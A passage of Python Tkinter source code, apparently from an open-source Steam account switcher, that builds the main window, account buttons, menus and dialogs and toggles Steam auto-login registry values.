command=self.orderwindow)
menu.add_command(label=_("Refresh autologin"),
command=self.refreshwindow)
menu.add_command(label=_("Update all avatars"),
command=self.update_avatar)
menu.add_separator()
menu.add_command(label=_("Settings"),
command=self.settingswindow)
menu.add_command(label=_("Send feedback"),
command=lambda: os.startfile('https://github.com/sw2719/steam-account-switcher/issues'))
menu.add_command(label=_("About"),
command=lambda: self.about(version))
menubar.add_cascade(label=_("Menu"), menu=menu)
self.config(menu=menubar)
if not self.BUNDLE:
debug_menu = tk.Menu(menubar, tearoff=0)
debug_menu.add_command(label='Check for updates with debug mode',
command=lambda: self.after(10, lambda: start_checkupdate(self, version, url, self.BUNDLE, debug=True)))
debug_menu.add_command(label='Check for updates without debug mode',
command=lambda: self.after(10, lambda: start_checkupdate(self, version, url, True)))
debug_menu.add_command(label='Check for updates (Force update available)',
command=lambda: self.after(10, lambda: start_checkupdate(self, '1.0', url, True)))
debug_menu.add_command(label='Check for updates (Raise error)',
command=lambda: self.after(10, lambda: start_checkupdate(self, version, url, True, exception=True)))
debug_menu.add_command(label="Download avatar images",
command=download_avatar)
debug_menu.add_command(label="Open initial setup",
command=lambda: self.welcomewindow(debug=True))
debug_menu.add_command(label="Open initial setup with after_update True",
command=lambda: self.welcomewindow(debug=True, update_override=True))
debug_menu.add_command(label="Toggle demo mode",
command=self.toggle_demo)
debug_menu.add_command(label="Raise exception",
command=raise_exception)
debug_menu.add_command(label="Open about window with copyright notice",
command=lambda: self.about(version, force_copyright=True))
debug_menu.add_command(label="Launch updater (update.zip required)",
command=launch_updater)
debug_menu.add_command(label="Create shortcut",
command=create_shortcut)
debug_menu.add_command(label="Exit app with sys.exit",
command=sys.exit)
menubar.add_cascade(label=_("Debug"), menu=debug_menu)
self.bottomframe = tk.Frame(self, bg=get_color('bottomframe'))
self.bottomframe.pack(side='bottom', fill='x')
def toggleAutologin():
'''Toggle autologin registry value between 0 and 1'''
if fetch_reg('RememberPassword') == 1:
setkey('RememberPassword', 0, winreg.REG_DWORD)
elif fetch_reg('RememberPassword') == 0:
setkey('RememberPassword', 1, winreg.REG_DWORD)
if fetch_reg('RememberPassword') == 1:
self.auto_var.set(_('Auto-login Enabled'))
self.autolabel['fg'] = get_color('autologin_text_on')
else:
self.auto_var.set(_('Auto-login Disabled'))
self.autolabel['fg'] = get_color('autologin_text_off')
self.restartbutton_text = tk.StringVar()
if get_config('autoexit') == 'true':
self.restartbutton_text.set(_('Restart Steam & Exit'))
else:
self.restartbutton_text.set(_('Restart Steam'))
self.button_toggle = SimpleButton(self.bottomframe,
widget='bottom_button',
text=_('Toggle auto-login'),
command=toggleAutologin,
bd=2)
self.button_exit = SimpleButton(self.bottomframe,
widget='bottom_button',
text=_('Exit'),
command=self.exit_app,
bd=2)
self.button_restart = SimpleButton(self.bottomframe,
widget='bottom_button',
textvariable=self.restartbutton_text,
command=self.exit_after_restart,
bd=2)
self.button_toggle.grid(row=0, column=0, padx=3, pady=3, sticky='nesw')
self.button_exit.grid(row=0, column=1, pady=3, sticky='nesw')
self.button_restart.grid(row=0, column=2, padx=3, pady=3, sticky='nesw')
self.bottomframe.grid_columnconfigure(0, weight=1)
self.bottomframe.grid_columnconfigure(1, weight=1)
self.bottomframe.grid_columnconfigure(2, weight=1)
self.bottomframe.grid_rowconfigure(0, weight=1)
self.button_dict = {}
self.upper_frame = tk.Frame(self, bg=get_color('upperframe'))
self.upper_frame.pack(side='top', fill='x')
self.button_frame = tk.Frame(self, bg=get_color('upperframe'))
self.button_frame.pack(side='top', fill='both', expand=True)
self.userlabel_1 = tk.Label(self.upper_frame, text=_('Current Auto-login user:'), bg=self.upper_frame['bg'], fg=get_color('text'))
self.userlabel_1.pack(side='top')
self.user_var = tk.StringVar()
self.user_var.set(fetch_reg('AutoLoginUser'))
self.userlabel_2 = tk.Label(self.upper_frame, textvariable=self.user_var, bg=self.upper_frame['bg'], fg=get_color('text'))
self.userlabel_2.pack(side='top', pady=2)
self.auto_var = tk.StringVar()
if fetch_reg('RememberPassword') == 1:
self.auto_var.set(_('Auto-login Enabled'))
auto_color = get_color('autologin_text_on')
else:
self.auto_var.set(_('Auto-login Disabled'))
auto_color = get_color('autologin_text_off')
self.autolabel = tk.Label(self.upper_frame, textvariable=self.auto_var, bg=self.upper_frame['bg'], fg=auto_color)
self.autolabel.pack(side='top')
tk.Frame(self.upper_frame, bg='grey').pack(fill='x')
self.draw_button()
def get_window_pos(self):
geo = self.geometry().split('+')
return geo[1], geo[2]
def popup_geometry(self, width, height, multiplier=1):
width_delta = (self.window_width - width) // 2
main_x, main_y = self.get_window_pos()
x = int(main_x) + width_delta
y = int(main_y) + (25 * multiplier)
return f'{str(width)}x{str(height)}+{str(x)}+{str(y)}'
def exit_app(self):
x, y = self.get_window_pos()
last_pos = f'{x}/{y}'
config_write_value('last_pos', last_pos)
sys.exit(0)
def toggle_demo(self):
if self.demo_mode:
self.demo_mode = False
else:
self.demo_mode = True
self.refresh()
def welcomewindow(self, debug=False, update_override=False):
if update_override:
window = WelcomeWindow(self, self.popup_geometry(320, 270, multiplier=2), True, debug)
else:
window = WelcomeWindow(self, self.popup_geometry(320, 270, multiplier=2), self.after_update, debug)
def event_function(event):
if str(event.widget) == '.!welcomewindow':
if self.accounts:
self.update_avatar()
self.refresh()
window.bind('<Destroy>', event_function)
def configwindow(self, username):
configwindow = tk.Toplevel(self, bg='white')
configwindow.title('')
x, y = self.get_window_pos()
configwindow.geometry(self.popup_geometry(250, 165))
configwindow.resizable(False, False)
configwindow.bind('<Escape>', lambda event: configwindow.destroy())
try:
configwindow.iconbitmap('asset/icon.ico')
except tk.TclError:
pass
i = self.accounts.index(username)
try:
custom_name = self.acc_dict[i]['customname']
except KeyError:
custom_name = ''
button_frame = tk.Frame(configwindow, bg='white')
button_frame.pack(side='bottom', pady=3)
ok_button = ttk.Button(button_frame, text=_('OK'))
ok_button.pack(side='right', padx=1.5)
cancel_button = ttk.Button(button_frame,
text=_('Cancel'),
command=configwindow.destroy)
cancel_button.pack(side='left', padx=1.5)
top_label = tk.Label(configwindow, text=_('Select name settings\nfor %s') % username, bg='white')
top_label.pack(side='top', pady=(4, 3))
radio_frame1 = tk.Frame(configwindow, bg='white')
radio_frame1.pack(side='top', padx=20, pady=(4, 2), fill='x')
radio_frame2 = tk.Frame(configwindow, bg='white')
radio_frame2.pack(side='top', padx=20, pady=(0, 3), fill='x')
radio_var = tk.IntVar()
if custom_name.strip():
radio_var.set(1)
else:
radio_var.set(0)
s = ttk.Style()
s.configure('config.TRadiobutton', background='white')
radio_default = ttk.Radiobutton(radio_frame1,
text=_('Use profile name if available'),
variable=radio_var,
value=0,
style='config.TRadiobutton')
radio_custom = ttk.Radiobutton(radio_frame2,
text=_('Use custom name'),
variable=radio_var,
value=1,
style='config.TRadiobutton')
radio_default.pack(side='left', pady=2)
radio_custom.pack(side='left', pady=2)
entry_frame = tk.Frame(configwindow, bg='white')
entry_frame.pack(side='bottom', pady=(1, 4))
name_entry = tk.Entry(entry_frame, width=27, disabledbackground='#C6C6C6', relief='solid')
name_entry.insert(0, custom_name)
name_entry.pack()
configwindow.grab_set()
configwindow.focus()
if radio_var.get() == 0:
name_entry['state'] = 'disabled'
name_entry.focus()
def reset_entry():
name_entry.delete(0, 'end')
name_entry['state'] = 'disabled'
def enable_entry():
name_entry['state'] = 'normal'
name_entry.focus()
radio_default['command'] = reset_entry
radio_custom['command'] = enable_entry
def ok(username):
if name_entry.get().strip() and radio_var.get() == 1:
input_name = name_entry.get()
self.acc_dict[i]['customname'] = input_name
print(f"Using custom name '{input_name}' for '{username}'.")
elif radio_var.get() == 1:
msgbox.showwarning(_('Info'), _('Enter a custom name to use.'), parent=configwindow)
return
else:
if self.acc_dict[i].pop('customname', None):
print(f"Custom name for '{username}' has been removed.")
with open('accounts.yml', 'w', encoding='utf-8') as f:
yaml.dump(self.acc_dict, f)
self.refresh()
configwindow.destroy()
def enterkey(event):
ok(username)
configwindow.bind('<Return>', enterkey)
ok_button['command'] = lambda username=username: ok(username)
configwindow.wait_window()
def button_func(self, username):
current_user = fetch_reg('AutoLoginUser')
try:
self.button_dict[current_user].enable()
except Exception:
pass
setkey('AutoLoginUser', username, winreg.REG_SZ)
self.button_dict[username].disable()
self.user_var.set(fetch_reg('AutoLoginUser'))
self.focus()
if get_config('mode') == 'express':
self.exit_after_restart()
def remove_user(self, target):
'''Write accounts to accounts.yml except the
one which user wants to delete'''
if msgbox.askyesno(_('Confirm'), _('Are you sure want to remove account %s?') % target):
acc_dict = acc_getdict()
accounts = acc_getlist()
dump_dict = {}
print(f'Removing {target}...')
for username in accounts:
if username != target:
dump_dict[len(dump_dict)] = acc_dict[accounts.index(username)]
with open('accounts.yml', 'w') as acc:
yaml.dump(dump_dict, acc)
self.refresh()
def draw_button(self):
if get_config('ui_mode') == 'list':
self.draw_button_list()
elif get_config('ui_mode') == 'grid':
self.draw_button_grid()
def draw_button_grid(self):
menu_dict = {}
self.no_user_frame = tk.Frame(self.button_frame, bg=self['bg'])
def onFrameConfigure(canvas):
canvas.configure(scrollregion=canvas.bbox("all"))
if self.demo_mode:
canvas = tk.Canvas(self.button_frame, borderwidth=0, highlightthickness=0)
canvas.config(bg=self['bg'])
buttonframe = tk.Frame(canvas, bg=self['bg'])
scroll_bar = ttk.Scrollbar(self.button_frame,
orient="vertical",
command=canvas.yview)
for x in range(0, 13):
self.button_dict[x] = AccountButtonGrid(buttonframe,
username='username' + str(x),
profilename='profilename' + str(x),
image='default')
if x == 0:
self.button_dict[x].disable()
row = x // 3
column = x % 3
if column == 1:
self.button_dict[x].grid(row=row, column=column, padx=0, pady=(9, 0))
else:
self.button_dict[x].grid(row=row, column=column, padx=10, pady=(9, 0))
buttonframe.grid_propagate(0)
scroll_bar.pack(side="right", fill="y")
canvas.pack(side="left", fill='both', expand=True)
h = 109 * (12 // 3)
canvas.create_window((0, 0), height=h + 9, width=295, window=buttonframe, anchor="nw")
canvas.configure(yscrollcommand=scroll_bar.set)
canvas.configure(width=self.button_frame.winfo_width(), height=self.button_frame.winfo_height())
def _on_mousewheel(event):
'''Scroll window on mousewheel input'''
widget = event.widget.winfo_containing(event.x_root, event.y_root)
if 'disabled' not in scroll_bar.state() and '!canvas' in str(widget):
canvas.yview_scroll(int(-1*(event.delta/120)), "units")
buttonframe.bind("<Configure>", lambda event,
canvas=canvas: onFrameConfigure(canvas))
self.bind("<MouseWheel>", _on_mousewheel)
elif self.accounts:
canvas = tk.Canvas(self.button_frame, borderwidth=0, highlightthickness=0)
canvas.config(bg=self['bg'])
buttonframe = tk.Frame(canvas, bg=self['bg'])
scroll_bar = ttk.Scrollbar(self.button_frame,
orient="vertical",
command=canvas.yview)
for index, username in enumerate(self.accounts):
steam64_list, account_name, persona_name = loginusers()
if username in account_name:
i = account_name.index(username)
else:
i = None
try:
acc_index = self.accounts.index(username)
profilename = self.acc_dict[acc_index]['customname']
except KeyError: # No custom name set
if i is not None: # i could be 0 so we can't use if i:
profilename = persona_name[i]
else:
profilename = _('N/A')
finally:
if i is not None: # i could be 0 so we can't use if i:
steam64 = steam64_list[i]
image = steam64
else:
steam64 = None
image = 'default'
profilename = profilename[:30]
# We have to make a menu for every account! Sounds ridiculous? Me too.
if SYS_LOCALE == 'ko_KR':
menu_font = tkfont.Font(self, size=9, family='맑은 고딕')
menu_dict[username] = tk.Menu(self, tearoff=0, font=menu_font)
else:
menu_dict[username] = tk.Menu(self, tearoff=0)
menu_dict[username].add_command(label=_("Set as auto-login account"),
command=lambda name=username: self.button_func(name))
menu_dict[username].add_separator()
if i is not None: # i could be 0 so we can't use if i:
menu_dict[username].add_command(label=_('Open profile in browser'),
command=lambda steamid64=steam64: os.startfile(f'https://steamcommunity.com/profiles/{steamid64}'))
menu_dict[username].add_command(label=_('Open screenshots folder'),
command=lambda steamid64=steam64: open_screenshot(steamid64))
menu_dict[username].add_command(label=_('View SteamID'),
command=lambda username=username, steamid64=steam64: steamid_window(self, username, steamid64, self.popup_geometry(270, 180)))
menu_dict[username].add_command(label=_('Update avatar'),
command=lambda steamid64=steam64: self.update_avatar(steamid_list=[steamid64]))
menu_dict[username].add_separator()
menu_dict[username].add_command(label=_("Name settings"),
command=lambda name=username, pname=profilename: self.configwindow(name))
menu_dict[username].add_command(label=_("Delete"),
command=lambda name=username: self.remove_user(name))
def popup(username, event):
menu_dict[username].tk_popup(event.x_root + 86, event.y_root + 13, 0)
self.button_dict[username] = AccountButtonGrid(buttonframe,
username=username,
profilename=profilename,
command=lambda name=username: self.button_func(name),
rightcommand=lambda event, username=username: popup(username, event),
image=image)
if username == fetch_reg('AutoLoginUser'):
self.button_dict[username].disable(no_fade=True)
row = index // 3
column = index % 3
if column == 1:
self.button_dict[username].grid(row=row, column=column, padx=0, pady=(9, 0))
else:
self.button_dict[username].grid(row=row, column=column, padx=10, pady=(9, 0))
buttonframe.grid_propagate(0)
scroll_bar.pack(side="right", fill="y")
canvas.pack(side="left", fill='both', expand=True)
if len(self.accounts) % 3 == 0:
h = 109 * (len(self.accounts) // 3)
else:
h = 109 * (len(self.accounts) // 3 + 1)
canvas.create_window((0, 0), height=h + 9, width=295, window=buttonframe, anchor="nw")
canvas.configure(yscrollcommand=scroll_bar.set)
canvas.configure(width=self.button_frame.winfo_width(), height=self.button_frame.winfo_height())
def _on_mousewheel(event):
'''Scroll window on mousewheel input'''
widget = event.widget.winfo_containing(event.x_root, event.y_root)
if 'disabled' not in scroll_bar.state() and '!canvas' in str(widget):
canvas.yview_scroll(int(-1*(event.delta/120)), "units")
buttonframe.bind("<Configure>", lambda event,
canvas=canvas: onFrameConfigure(canvas))
self.bind("<MouseWheel>", _on_mousewheel)
else:
self.no_user_frame.pack(side='top', fill='both', expand=True)
no_user = tk.Label(self.no_user_frame, text=_('No accounts added'), bg=self['bg'])
self.unbind("<MouseWheel>")
no_user.pack(pady=(150, 0))
def draw_button_list(self):
menu_dict = {}
self.no_user_frame = tk.Frame(self.button_frame, bg=self['bg'])
def onFrameConfigure(canvas):
canvas.configure(scrollregion=canvas.bbox("all"))
if self.demo_mode:
canvas = tk.Canvas(self.button_frame, borderwidth=0, highlightthickness=0)
canvas.config(bg=self['bg'])
buttonframe = tk.Frame(canvas)
scroll_bar = ttk.Scrollbar(self.button_frame,
orient="vertical",
command=canvas.yview)
for x in range(0, 8):
self.button_dict[x] = AccountButton(buttonframe,
username='username' + str(x),
profilename='profilename' + str(x),
image='default')
if x == 0:
self.button_dict[x].disable()
self.button_dict[x].pack(fill='x')
tk.Frame(buttonframe, bg='#c4c4c4').pack(fill='x')
scroll_bar.pack(side="right", fill="y")
canvas.pack(side="left", fill='both', expand=True)
h = 49 * 8
canvas.create_window((0, 0), height=h, width=310, window=buttonframe, anchor="nw")
canvas.configure(yscrollcommand=scroll_bar.set)
canvas.configure(width=self.button_frame.winfo_width(), height=self.button_frame.winfo_height())
def _on_mousewheel(event):
'''Scroll window on mousewheel input'''
widget = event.widget.winfo_containing(event.x_root, event.y_root)
if 'disabled' not in scroll_bar.state() and '!canvas' in str(widget):
canvas.yview_scroll(int(-1*(event.delta/120)), "units")
buttonframe.bind("<Configure>", lambda event,
canvas=canvas: onFrameConfigure(canvas))
self.bind("<MouseWheel>", _on_mousewheel)
elif self.accounts:
canvas = tk.Canvas(self.button_frame, borderwidth=0, highlightthickness=0)
canvas.config(bg=self['bg'])
buttonframe = tk.Frame(canvas)
scroll_bar = ttk.Scrollbar(self.button_frame,
orient="vertical",
command=canvas.yview)
for username in self.accounts:
steam64_list, account_name, persona_name = loginusers()
if username in account_name:
i = account_name.index(username)
else:
i = None
try:
acc_index = self.accounts.index(username)
profilename = self.acc_dict[acc_index]['customname']
except KeyError: # No custom name set
if i is not None: # i could be 0 so we can't use if i:
profilename = persona_name[i]
else:
profilename = _('Profile name not available')
finally:
if i is not None: # i could be 0 so we can't use if i:
steam64 = steam64_list[i]
image = steam64
else:
steam64 = None
image = 'default'
profilename = profilename[:30]
# We have to make a menu for every account! Sounds ridiculous? Me too.
if SYS_LOCALE == 'ko_KR':
menu_font = tkfont.Font(self, size=9, family='맑은 고딕')
menu_dict[username] = tk.Menu(self, tearoff=0, font=menu_font)
else:
menu_dict[username] = tk.Menu(self, tearoff=0)
menu_dict[username].add_command(label=_("Set as auto-login account"),
command=lambda name=username: self.button_func(name))
menu_dict[username].add_separator()
if i is not None: # i could be 0 so we can't use if i:
menu_dict[username].add_command(label=_('Open profile in browser'),
command=lambda steamid64=steam64: os.startfile(f'https://steamcommunity.com/profiles/{steamid64}'))
menu_dict[username].add_command(label=_('Open screenshots folder'),
command=lambda steamid64=steam64: open_screenshot(steamid64))
menu_dict[username].add_command(label=_('View SteamID'),
command=lambda username=username, steamid64=steam64: steamid_window(self, username, steamid64, self.popup_geometry(270, 180)))
menu_dict[username].add_command(label=_('Update avatar'),
command=lambda steamid64=steam64: self.update_avatar(steamid_list=[steamid64]))
menu_dict[username].add_separator()
menu_dict[username].add_command(label=_("Name settings"),
command=lambda name=username, pname=profilename: self.configwindow(name))
menu_dict[username].add_command(label=_("Delete"),
command=lambda name=username: self.remove_user(name))
def popup(username, event):
menu_dict[username].tk_popup(event.x_root + 86, event.y_root + 13, 0)
self.button_dict[username] = AccountButton(buttonframe,
username=username,
profilename=profilename,
command=lambda name=username: self.button_func(name),
rightcommand=lambda event, username=username: popup(username, event),
image=image)
if username == fetch_reg('AutoLoginUser'):
self.button_dict[username].disable(no_fade=True)
self.button_dict[username].pack(fill='x')
tk.Frame(buttonframe, bg=get_color('seperator')).pack(fill='x')
scroll_bar.pack(side="right", fill="y")
canvas.pack(side="left", fill='both', expand=True)
h = 49 * len(self.accounts)
canvas.create_window((0, 0), height=h, width=295, window=buttonframe, anchor="nw")
canvas.configure(yscrollcommand=scroll_bar.set)
canvas.configure(width=self.button_frame.winfo_width(), height=self.button_frame.winfo_height())
def _on_mousewheel(event):
'''Scroll window on mousewheel input'''
widget = event.widget.winfo_containing(event.x_root, event.y_root)
if 'disabled' not in scroll_bar.state() and '!canvas' in str(widget):
canvas.yview_scroll(int(-1*(event.delta/120)), "units")
buttonframe.bind("<Configure>", lambda event,
canvas=canvas: onFrameConfigure(canvas))
self.bind("<MouseWheel>", _on_mousewheel)
else:
self.no_user_frame.pack(side='top', fill='both', expand=True)
no_user = tk.Label(self.no_user_frame, text=_('No accounts added'), bg=self['bg'], fg=get_color('text'))
self.unbind("<MouseWheel>")
no_user.pack(pady=(150, 0))
def refresh(self, no_frame=False):
'''Refresh main window widgets'''
self.accounts = acc_getlist()
self.acc_dict = acc_getdict()
if not no_frame:
self.no_user_frame.destroy()
self.button_frame.destroy()
self.button_frame = tk.Frame(self, bg=get_color('bottomframe'))
self.button_frame.pack(side='top', fill='both', expand=True)
self['bg'] = get_color('window_background')
self.bottomframe.configure(bg=get_color('bottomframe'))
self.button_toggle.update_color()
self.button_exit.update_color()
self.button_restart.update_color()
self.upper_frame.configure(bg=get_color('upperframe'))
self.userlabel_1.configure(bg=self.upper_frame['bg'], fg=get_color('text'))
self.userlabel_2.configure(bg=self.upper_frame['bg'], fg=get_color('text'))
update_frame_color()
if fetch_reg('RememberPassword') == 1:
self.auto_var.set(_('Auto-login Enabled'))
auto_color = get_color('autologin_text_on')
else:
self.auto_var.set(_('Auto-login Disabled'))
auto_color = get_color('autologin_text_off')
self.autolabel.configure(bg=self.upper_frame['bg'], fg=auto_color)
if self.demo_mode:
self.user_var.set('username0')
else:
self.user_var.set(fetch_reg('AutoLoginUser'))
if self.demo_mode:
self.auto_var.set(_('Auto-login Enabled'))
elif fetch_reg('RememberPassword') == 1:
self.auto_var.set(_('Auto-login Enabled'))
else:
self.auto_var.set(_('Auto-login Disabled'))
self.draw_button()
if get_config('autoexit') == 'true':
self.restartbutton_text.set(_('Restart Steam & Exit'))
else:
self.restartbutton_text.set(_('Restart Steam'))
print('Menu refreshed with %s account(s)' % len(self.accounts))
def update_avatar(self, steamid_list=None, no_ui=False):
label = tk.Label(self, text=_('Please wait while downloading avatars...'), bg=self['bg'], fg=get_color('text'))
if not no_ui:
self.no_user_frame.destroy()
self.button_frame.destroy()
hide_update()
self.bottomframe.pack_forget()
label.pack(expand=True)
self.update()
if steamid_list:
dl_list = steamid_list
else:
dl_list = []
steamid_list, accountname, __ = loginusers()
for index, steamid in enumerate(steamid_list):
if accountname[index] in self.accounts:
dl_list.append(steamid)
download_avatar(dl_list)
if not no_ui:
label.destroy()
self.refresh(no_frame=True)
self.bottomframe.pack(side='bottom', fill='x')
show_update()
def about(self, version, force_copyright=False):
'''Open about window'''
if LOCALE == 'fr_FR':
height = 200
else:
height = 180
aboutwindow = tk.Toplevel(self, bg='white')
aboutwindow.title(_('About'))
aboutwindow.geometry(self.popup_geometry(360, height))
aboutwindow.resizable(False, False)
aboutwindow.focus()
aboutwindow.bind('<Escape>', lambda event: aboutwindow.destroy())
try:
aboutwindow.iconbitmap('asset/icon.ico')
except tk.TclError:
pass
about_disclaimer = tk.Label(aboutwindow, bg='white', fg='black',
text=_('Warning: The developer of this application is not responsible for\n' +
'data loss or any other damage from the use of this app.'))
about_steam_trademark = tk.Label(aboutwindow, bg='white', fg='black',
text=_('STEAM is a registered trademark of Valve Corporation.'))
if self.BUNDLE or force_copyright:
copyright_label = tk.Label(aboutwindow, bg='white', fg='black',
text='Copyright (c) 2020 sw2719 | All Rights Reserved\n' +
'View copyright notice for details')
else:
copyright_label = tk.Label(aboutwindow, bg='white', fg='black',
text='Copyright (c) 2020 sw2719 | All Rights Reserved\n' +
'View LICENSE file for details')
ver = tk.Label(aboutwindow, bg='white', fg='black',
text='Steam Account Switcher | Version ' + version)
def copyright_notice():
cprightwindow = tk.Toplevel(aboutwindow, bg='white')
cprightwindow.title(_('Copyright notice'))
cprightwindow.geometry(self.popup_geometry(630, 350, multiplier=2))
cprightwindow.resizable(False, False)
cprightwindow.focus()
cprightwindow.bind('<Escape>', lambda event: cprightwindow.destroy())
ttk.Button(cprightwindow, text=_('Close'), command=cprightwindow.destroy).pack(side='bottom', pady=3)
ttk.Separator(cprightwindow, orient=tk.HORIZONTAL).pack(side='bottom', fill='x')
cpright_text = ScrolledText(cprightwindow, bd=1, relief='flat')
with open('asset/COPYRIGHT_NOTICE', encoding='utf-8') as txt:
cpright_text.insert(tk.CURRENT, txt.read())
cpright_text.configure(state=tk.DISABLED)
cpright_text.pack(side='top', expand=True, fill='both')
button_frame = tk.Frame(aboutwindow, bg='white')
button_frame.pack(side='bottom', pady=5)
button_close = ttk.Button(button_frame,
text=_('Close'),
command=aboutwindow.destroy)
button_github = ttk.Button(button_frame,
text=_('GitHub page'),
command=lambda: os.startfile('https://github.com/sw2719/steam-account-switcher'))
button_copyright = ttk.Button(button_frame,
text=_('Copyright notice'),
command=copyright_notice)
button_frame.grid_columnconfigure(0, weight=1)
button_frame.grid_columnconfigure(1, weight=1)
button_frame.grid_columnconfigure(2, weight=1)
button_frame.grid_rowconfigure(0, weight=1)
about_disclaimer.pack(pady=8)
about_steam_trademark.pack()
copyright_label.pack(pady=5)
ver.pack()
button_close.grid(row=0, column=0, padx=2)
button_github.grid(row=0, column=1, padx=2)
if self.BUNDLE or force_copyright:
button_copyright.grid(row=0, column=2, padx=2)
def refreshwindow(self):
'''Open remove accounts window'''
accounts = acc_getlist()
if not accounts:
msgbox.showinfo(_('No Accounts'),
_("There's no account added."))
return
refreshwindow = tk.Toplevel(self, bg='white')
refreshwindow.title(_("Refresh"))
refreshwindow.geometry(self.popup_geometry(230, 320))
refreshwindow.resizable(False, False)
refreshwindow.bind('<Escape>', lambda event: refreshwindow.destroy())
refreshwindow.grab_set()
refreshwindow.focus()
try:
refreshwindow.iconbitmap('asset/icon.ico')
except tk.TclError:
pass
bottomframe_rm = tk.Frame(refreshwindow, bg='white')
bottomframe_rm.pack(side='bottom')
removelabel = tk.Label(refreshwindow, text=_('Select accounts to refresh.'), bg='white')
removelabel.pack(side='top', padx=5, pady=5)
def close():
refreshwindow.destroy()
def onFrameConfigure(canvas):
canvas.configure(scrollregion=canvas.bbox("all"))
canvas = tk.Canvas(refreshwindow, borderwidth=0, highlightthickness=0, bg='white')
check_frame = tk.Frame(canvas, bg='white')
scroll_bar = ttk.Scrollbar(refreshwindow,
orient="vertical",
command=canvas.yview)
canvas.configure(yscrollcommand=scroll_bar.set)
scroll_bar.pack(side="right", fill="y")
canvas.pack(side="left", fill="both", expand=True)
canvas.create_window((4, 4), window=check_frame, anchor="nw")
def _on_mousewheel(event):
'''Scroll window on mousewheel input'''
if 'disabled' not in scroll_bar.state():
canvas.yview_scroll(int(-1*(event.delta/120)), "units")
check_frame.bind("<Configure>", lambda event,
canvas=canvas: onFrameConfigure(canvas))
canvas.bind("<MouseWheel>", _on_mousewheel)
check_dict = {}
s = ttk.Style()
s.configure('check.TCheckbutton', background='white')
for v in accounts:
tk_var = tk.IntVar()
checkbutton = ttk.Checkbutton(check_frame,
text=v,
variable=tk_var,
style='check.TCheckbutton')
checkbutton.bind("<MouseWheel>", _on_mousewheel)
checkbutton.pack(side='top', padx=2, anchor='w')
check_dict[v] = tk_var
def refreshuser():
refreshwindow.destroy()
to_refresh = []
current_user = fetch_reg('AutoLoginUser')
for v in accounts:
if check_dict.get(v).get() == 1:
to_refresh.append(v)
else:
continue
self.withdraw()
msgbox.showinfo('', _('Accounts with expired autologin token will show login prompt.') + '\n\n' +
_('Close the prompt or login to continue the process.')) # NOQA
popup = tk.Toplevel(self, bg='white')
popup.title('')
popup.geometry(self.popup_geometry(180, 100))
popup.resizable(False, False)
popup_var = tk.StringVar()
popup_var.set(_('Initializing...'))
popup_uservar = tk.StringVar()
popup_uservar.set('---------')
popup_label = tk.Label(popup, textvariable=popup_var, bg='white')
popup_user = tk.Label(popup, textvariable=popup_uservar, bg='white')
popup_label.pack(pady=17)
popup_user.pack()
self.update()
for username in accounts:
if username in to_refresh:
popup_uservar.set(username)
popup_var.set(_('Switching account...'))
self.update()
setkey('AutoLoginUser', username, winreg.REG_SZ)
if username == accounts[-1] and username == current_user:
legacy_restart(silent=False)
else:
legacy_restart()
while fetch_reg('pid') == 0:
sleep(1)
popup_var.set(_('Waiting for Steam...'))
self.update()
while True: # Wait for Steam to log in
sleep(1)
if fetch_reg('ActiveUser') != 0:
sleep(4)
break
popup.destroy()
self.update()
if current_user != fetch_reg('AutoLoginUser'):
if msgbox.askyesno('', _('Do you want to start Steam with previous autologin account?')):
setkey('AutoLoginUser', current_user, winreg.REG_SZ)
legacy_restart(silent=False)
else:
subprocess.run("start steam://open/main", shell=True)
self.deiconify()
self.refresh()
refresh_cancel = ttk.Button(bottomframe_rm,
text=_('Cancel'),
command=close,
width=9)
refresh_ok = ttk.Button(bottomframe_rm,
text=_('Refresh'),
command=refreshuser,
width=9)
refresh_cancel.pack(side='left', padx=5, pady=3)
refresh_ok.pack(side='left', padx=5, pady=3)
def addwindow(self):
'''Open add accounts window'''
accounts = acc_getlist()
acc_dict = acc_getdict()
steamid_list, account_name, persona_name = loginusers()
x, y = self.get_window_pos()
addwindow = tk.Toplevel(self, bg='white')
addwindow.title(_("Add"))
addwindow.geometry(self.popup_geometry(300, 150))
addwindow.resizable(False, False)
addwindow.bind('<Escape>', lambda event: addwindow.destroy())
try:
addwindow.iconbitmap('asset/icon.ico')
except tk.TclError:
pass
topframe_add = tk.Frame(addwindow, bg='white')
topframe_add.pack(side='top', anchor='center')
bottomframe_add = tk.Frame(addwindow, bg='white')
bottomframe_add.pack(side='bottom', anchor='e', fill='x')
addlabel_row1 = tk.Label(topframe_add, bg='white',
text=_('Enter account(s) to add.'))
addlabel_row2 = tk.Label(topframe_add, bg='white',
text=_("In case of adding multiple accounts,") + '\n' +
_("seperate each account with '/' (slash)."))
account_entry = ttk.Entry(bottomframe_add, width=29)
addwindow.grab_set()
addwindow.focus()
account_entry.focus()
def disable_close():
pass
def adduser(userinput):
'''Write accounts from user's input to accounts.yml
:param userinput: Account names to add
'''
nonlocal acc_dict
dl_list = []
if userinput.strip():
name_buffer = userinput.split("/")
accounts_to_add = [name.strip() for name in name_buffer if name.strip()]
for name_to_write in accounts_to_add:
if name_to_write not in accounts:
acc_dict[len(acc_dict)] = {'accountname': name_to_write}
if name_to_write in account_name:
dl_list.append(steamid_list[account_name.index(name_to_write)])
else:
print(f'Account {name_to_write} already exists!')
msgbox.showinfo(_('Duplicate Alert'),
_('Account %s already exists.')
% name_to_write)
with open('accounts.yml', 'w') as acc:
yaml = YAML()
yaml.dump(acc_dict, acc)
if dl_list and get_config('show_avatar') == 'true':
button_addcancel.destroy()
bottomframe_add.destroy()
topframe_add.destroy()
addwindow.protocol("WM_DELETE_WINDOW", disable_close)
addwindow.focus()
tk.Label(addwindow, text=_('Please wait while downloading avatars...'), bg='white').pack(fill='both', expand=True)
self.update()
download_avatar(dl_list)
self.refresh()
addwindow.destroy()
def close():
addwindow.destroy()
def enterkey(event):
adduser(account_entry.get())
addwindow.bind('<Return>', enterkey)
button_add = ttk.Button(bottomframe_add, width=10, text=_('Add'),
command=lambda: adduser(account_entry.get()))
button_addcancel = ttk.Button(addwindow, width=10,
text=_('Cancel'), command=close)
addlabel_row1.pack(pady=10)
addlabel_row2.pack()
account_entry.pack(side='left', padx=(3, 0), pady=3, fill='x', expand=True)
button_add.pack(side='right', anchor='e', padx=3, pady=3)
button_addcancel.pack(side='bottom', anchor='e', padx=3)
def importwindow(self):
'''Open import accounts window'''
accounts = acc_getlist()
acc_dict = acc_getdict()
steamid_list, account_name, persona_name = loginusers()
if set(account_name).issubset(set(acc_getlist())):
msgbox.showinfo(_('Info'), _("There's no account left to import."))
return
s = ttk.Style()
s.configure('Import.TCheckbutton', background='white')
